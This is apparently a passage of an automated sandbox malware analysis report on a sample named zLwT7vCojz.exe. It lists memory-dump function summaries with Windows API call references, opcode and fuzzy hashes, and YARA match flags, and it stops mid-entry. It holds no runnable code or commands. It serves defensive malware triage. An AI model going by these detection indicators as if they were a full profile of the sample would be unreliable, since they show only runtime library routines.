                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                              • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                              • Instruction ID: 0251fcc9be1f808cace2e73f6de765c4c9d399abfd60cd16568eb1f1af95a12f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F741D172A00310AFDB24DF78C880B5EB7B5EF89325F555569D615EB290EB71FA01CB80
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                              • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                              • Instruction ID: dd2835c9885c6aa3f8cce8b3b5d5cac91b3775441f4e2c90be38872ca8706c4a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A341D332E00710EFDB15DFA9C880A9AB7B1EF89314B1545AAE515EB382D735AD41CB84
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0041B4AE
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
                                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0041B51A
                                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 313313983-0
                                                                                                                                                                                                                                              • Opcode ID: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                              • Instruction ID: e6e93543b041c594e81487d5909f541e573430f1ea5015fd54542e6688d1641d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E931AC32A0021AABDB249F65DC41DEF7BA5EF40318F04412AFC04D6291EB39CD95CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0433E7A3
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0433E7C6
                                                                                                                                                                                                                                                • Part of subcall function 04337CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04337CDE
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0433E7EC
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433E7FF
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0433E80E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                                              • Opcode ID: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
                                                                                                                                                                                                                                              • Instruction ID: 260c750483194d32ed42b11d56311e5f0bbf552fc0e8574b9664004ce43c934a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39018F72B027257F233126BA5C8DC7F6E6DDFC2EA6315123DF914D6200EE65AD0281B5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F
                                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041E598
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                                              • Opcode ID: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
                                                                                                                                                                                                                                              • Instruction ID: da1d7805988d3e4f29d48d7d5147bf5fd0936ba562dc79f78d94e6ba61cfb34a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4901D8766027207F23211AB75C48DFF6E6EDEC6B98355012EFD08D6200FE688D429178
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,043325ED,04337307,?,04336FAE,00000001,00000364,?,0432E697,?,?,?,0432ED94,?), ref: 04337009
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433703E
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04337065
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 04337072
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0433707B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                                              • Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                              • Instruction ID: cd02e69d83a86ed929f5ce64792f6739b1c6777cd979d4a4f71760112ac62a57
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D501F9F6640A003BA73227F56C84F5F265DEFC1277721B238F515A2280FF25A8024564
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416DD7
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416DFE
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                                              • Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                              • Instruction ID: e46c26cc5ac3d344e97fba90109cbcfbfaa945fe7b6790f8bafc9466d81cae3c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA01D6367447106A82217676BC85EEB2629DBC5764763027FF515A2282EF2CCC86515C
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F11D
                                                                                                                                                                                                                                                • Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
                                                                                                                                                                                                                                                • Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F12F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F141
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F153
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F165
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                              • Instruction ID: a0d3cda316aea8aa4a5b6d5fd28f0e12de95077906e9d2ee57cd9631d2662d1f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21F09632C00A00BFEA30DBA8F8C6D1777D9EE047527943825F554D7600CB35FC814A94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EEB6
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EEC8
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EEDA
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EEEC
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041EEFE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                              • Instruction ID: 4b083a6e31e8a48a8b86c3cb0939e7a8061e9024a6891407e723d3d4127bfca1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F04F32504310AB8A20EB6AF886E9773D9FA44764355480AFD08D7600CB38FCC0869C
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04335537
                                                                                                                                                                                                                                                • Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
                                                                                                                                                                                                                                                • Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04335549
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433555C
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433556D
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433557E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                              • Instruction ID: c68db39bdec9f82db64391ca3a6824df879c0d90ab4545389c6ed376364afa9d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF03AB1811620AFEA266F59FCC15053F61EB14626351717AF508A2278CF3A6A818FCA
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                              • Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 0-2895899722
                                                                                                                                                                                                                                              • Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                              • Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _strpbrk.LIBCMT ref: 0433DB07
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433DC24
                                                                                                                                                                                                                                                • Part of subcall function 04330B99: IsProcessorFeaturePresent.KERNEL32(00000017,04330B6B,00000016,04332DA0,0000002C,00439740,0433D634,?,?,?,04330B78,00000000,00000000,00000000,00000000,00000000), ref: 04330B9B
                                                                                                                                                                                                                                                • Part of subcall function 04330B99: GetCurrentProcess.KERNEL32(C0000417,04332DA0,00000016,04337003), ref: 04330BBD
                                                                                                                                                                                                                                                • Part of subcall function 04330B99: TerminateProcess.KERNEL32(00000000), ref: 04330BC4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                                              • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                              • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                              • Instruction ID: 26ea7e95c7a84583d6ae3d0f6c1717e559746c2348b354d0c5e55d8c2eff7687
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2151A271E00209AFDF15DFA8C880AADFBF5FF88715F2491A9D855E7340E675AA018B50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _strpbrk.LIBCMT ref: 0041D8A0
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041D9BD
                                                                                                                                                                                                                                                • Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
                                                                                                                                                                                                                                                • Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
                                                                                                                                                                                                                                                • Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                                              • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                              • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                              • Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\zLwT7vCojz.exe,00000104), ref: 0433356A
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04333635
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433363F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                              • API String ID: 2506810119-304640906
                                                                                                                                                                                                                                              • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                              • Instruction ID: 064fa542712c90b7f2fb2a731b95b75e60cc6fd1edfaee0e7adabf0a037b8646
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F317371A04258AFFB21DF999CC499EBBFCEF84716F109066E80597210D770AA41CF95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\zLwT7vCojz.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                              • API String ID: 2506810119-304640906
                                                                                                                                                                                                                                              • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                              • Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
